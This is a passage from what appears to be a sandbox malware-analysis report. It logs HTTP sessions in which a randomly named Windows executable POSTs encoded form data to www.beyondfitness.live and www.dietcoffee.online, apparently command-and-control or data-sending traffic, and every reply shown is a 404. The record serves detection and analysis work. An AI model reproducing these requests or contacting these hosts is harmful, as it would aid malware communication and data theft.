                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                                              Dec 2, 2024 14:45:49.996412992 CET224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                                              Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.1050010209.74.77.107806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:55.552484989 CET634OUTPOST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 6a 75 6c 45 6c 62 78 6b 45 38 30 4d 62 64 76 4c 42 65 79 4b 30 6a 75 4e 38 72 30 54 76 36 75 6e 34 75 58 68 53 4f 53 69 39 6d 5a 5a 38 62 62 4f 61 6a 32 42 75 38 61 4d 4f 56 78 58 46 56 4b 58 58 55 34 4e 6e 2b 68 35 6b 73 68 76 6f 33 66 71 70 56 4c 43 6e 31 68 75 6f 55 50 34 58 79 4a 53 77 65 75 6e 4a 34 45 43 34 55 57 69 5a 75 35 56 70 78 4d 34 6a 6f 4c 66 6f 7a 46 4b 30 67 4f 38 6c 70 58 31 42 37 49 7a 70 4e 77 2f 66 64 6e 35 2f 48 32 67 34 6f 67 39 75 54 72 71 61 6b 2b 56 39 65 59 30 30 78 31 30 55 6d 51 44 57 30 69
                                                                              Data Ascii: 6NVpdLF=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2g4og9uTrqak+V9eY00x10UmQDW0i
                                                                              Dec 2, 2024 14:45:56.855241060 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:56 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.1050011209.74.77.107806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:58.214344978 CET658OUTPOST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 4f 75 6e 59 2b 58 67 54 4f 53 6c 39 6d 5a 57 63 62 61 4b 61 6a 44 42 75 77 53 4d 4c 39 78 58 45 78 4b 58 56 38 34 4f 51 4b 75 72 6b 73 6a 6a 49 33 52 31 35 56 4c 43 6e 31 68 75 6f 41 68 34 58 71 4a 53 42 75 75 6c 6f 34 48 4c 59 55 58 31 70 75 35 47 35 78 49 34 6a 70 75 66 72 33 76 4b 32 49 4f 38 6b 5a 58 77 41 37 58 36 70 4e 36 79 2f 63 33 39 75 79 75 69 71 38 4a 79 38 54 66 72 37 73 6d 53 63 6a 66 6c 6c 51 69 6e 6a 36 65 4e 51 42 49 74 73 6e 4e 48 46 51 53 72 6d 33 48 66 41 2f 6c 65 59 2b 46 55 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinj6eNQBItsnNHFQSrm3HfA/leY+FUg==
                                                                              Dec 2, 2024 14:45:59.515208006 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:59 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.1050012209.74.77.107806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:00.883522987 CET1671OUTPOST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 32 75 6b 75 79 58 68 77 6d 53 6b 39 6d 5a 62 38 62 68 4b 61 6a 61 42 75 6f 57 4d 4c 35 4c 58 48 5a 4b 4e 30 63 34 46 42 4b 75 78 30 73 6a 2b 59 33 63 71 70 56 65 43 6e 6c 62 75 6f 51 68 34 58 71 4a 53 43 32 75 73 5a 34 48 4e 59 55 57 69 5a 75 6c 56 70 78 77 34 6a 68 59 66 6f 62 56 4a 47 6f 4f 37 45 4a 58 33 69 44 58 6d 35 4e 30 31 2f 64 79 39 75 75 50 69 71 67 4e 79 39 33 68 72 38 41 6d 57 49 58 49 78 58 51 6e 36 53 4c 66 45 69 52 34 74 71 48 58 4b 6c 64 55 70 54 2f 39 46 67 36 73 62 71 7a 63 42 53 30 4b 50 6e 30 38 6a 73 35 6a 5a 36 65 41 59 49 56 57 70 6d 49 53 72 37 2b 4f 30 39 5a 50 79 4d 47 50 6c 55 67 55 68 49 58 6a 32 70 4e 49 55 6e 4a 50 47 76 38 53 59 57 4b 6a 66 2b 63 5a 4c 6e 4e 6c 36 76 58 47 70 38 78 49 54 48 6e 67 39 6d 41 69 4d 75 47 37 31 70 6f 46 76 46 76 48 39 2f 77 32 51 58 62 2b 6a 6a 2b 54 4b 4c 65 4c 62 2b 77 62 72 79 49 67 50 70 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTd2ukuyXhwmSk9mZb8bhKajaBuoWML5LXHZKN0c4FBKux0sj+Y3cqpVeCnlbuoQh4XqJSC2usZ4HNYUWiZulVpxw4jhYfobVJGoO7EJX3iDXm5N01/dy9uuPiqgNy93hr8AmWIXIxXQn6SLfEiR4tqHXKldUpT/9Fg6sbqzcBS0KPn08js5jZ6eAYIVWpmISr7+O09ZPyMGPlUgUhIXj2pNIUnJPGv8SYWKjf+cZLnNl6vXGp8xITHng9mAiMuG71poFvFvH9/w2QXb+jj+TKLeLb+wbryIgPpW2oVMq14tkRtGGs60Ep8+cP3PStaB+9czZgqe/NZS0dH35d1ZL+nwoqAlgEBVNqoIW0NTP9eV+otfKCpDRfi2Bk0wp51jZzVeJCRzncEbF8eAWBmfHuTqliEQbF5B9xe6lRRyeEBFqv3k0ZxdqqEOgM8EV7BQIVYW/HzEY0yCwLiNC423IEB47SWsBAi7nrNnX0/chUHgNDTfTPLuZhYFNGxvzenLUEE4XvzWPUC1S7sI9KAi46yE9AXIFGoHJ3o+O4JJjLpzODo4HheEY/5BI+1tb8qdeijRUcYbduJ+mlnrKElag0UO3d2tI/xM1aOz5Yla/zLh86VcK5R68K3yY8HLT+CPCZS0FyBofRf+EeDjD7xe2vNFhZgHLqdFKwjP25YKWjAJh54494JTn8XaZ9/H8SNGazXuHSIoYkYvzESz55ZUwGUj1N6f3fdIbLepH+JR71gNCQjFQ4qzYFVxjK1BWXF62/a1fAjkiCBkaKp1P4X6oa8+QfcGccIAh4QJnH1DeM64P3YsHU3/bd+01PkA3bUJjKjkxFImFPy80tBGPWbyLDwFYfRt8T5EJ9IOj/tKo1z6qpOA2oRSu0TaUwnBtqDqifuO2B0pLKipl8iDDwbIMXuLPh/UvwV7N2Jvu47Gs4yQq6nDj0tTTabb8NK2jrJ9rmYLn [TRUNCATED]
                                                                              Dec 2, 2024 14:46:02.134522915 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:46:01 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.1050013209.74.77.107806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:03.548378944 CET361OUTGET /fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:04.854644060 CET548INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:46:04 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.105001477.68.64.45806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:10.528140068 CET631OUTPOST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 36 54 53 6e 61 56 70 53 4a 68 7a 31 6d 48 46 67 6a 72 76 75 36 6c 61 66 55 55 2b 67 30 44 67 5a 68 53 6d 51 6c 4d 44 6e 4a 36 33 32 6f 50 2f 36 64 66 61 6f 52 6e 30 50 36 76 69 4b 79 2f 4d 71 33 57 30 43 68 45 67 6e 78 45 4c 73 72 64 74 38 44 33 35 51 4a 49 43 67 38 4d 35 72 61 66 58 35 30 72 6d 6f 4f 4d 45 52 63 33 69 72 2b 43 30 6d 6d 38 36 77 69 39 39 5a 55 4b 32 37 77 39 52 4a 4e 66 49 57 78 59 38 4f 45 46 50 55 46 34 47 73 2f 6f 2f 54 71 55 51 70 45 49 59 56 70 72 31 76 56 73 64 6b 37 6f 76 33 6d 67 54 62 6f 4b 6c 51
                                                                              Data Ascii: 6NVpdLF=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/TqUQpEIYVpr1vVsdk7ov3mgTboKlQ
                                                                              Dec 2, 2024 14:46:11.791536093 CET391INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:11 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.105001577.68.64.45806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:13.197489977 CET655OUTPOST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 55 5a 6d 78 79 51 33 39 44 6e 49 36 33 32 67 76 2f 37 51 2f 61 76 52 6e 34 70 36 72 71 4b 79 2b 6f 71 33 54 59 43 69 7a 4d 6b 78 55 4c 35 71 74 74 79 4d 58 35 51 4a 49 43 67 38 49 6f 38 61 66 50 35 31 62 32 6f 4f 74 45 51 66 33 69 73 32 69 30 6d 33 73 36 4f 69 39 39 33 55 4a 7a 75 77 2f 70 4a 4e 66 34 57 79 4b 45 4a 54 56 50 6f 42 34 48 46 2b 34 32 72 73 45 55 33 43 4c 35 65 72 71 31 4d 62 74 67 6a 71 35 4f 67 31 58 50 56 6d 4d 51 36 43 71 34 4d 64 75 2b 30 79 71 45 58 6a 58 67 72 63 5a 5a 68 4d 41 3d 3d
                                                                              Data Ascii: 6NVpdLF=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XPVmMQ6Cq4Mdu+0yqEXjXgrcZZhMA==
                                                                              Dec 2, 2024 14:46:14.520742893 CET391INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:14 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.105001677.68.64.45806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
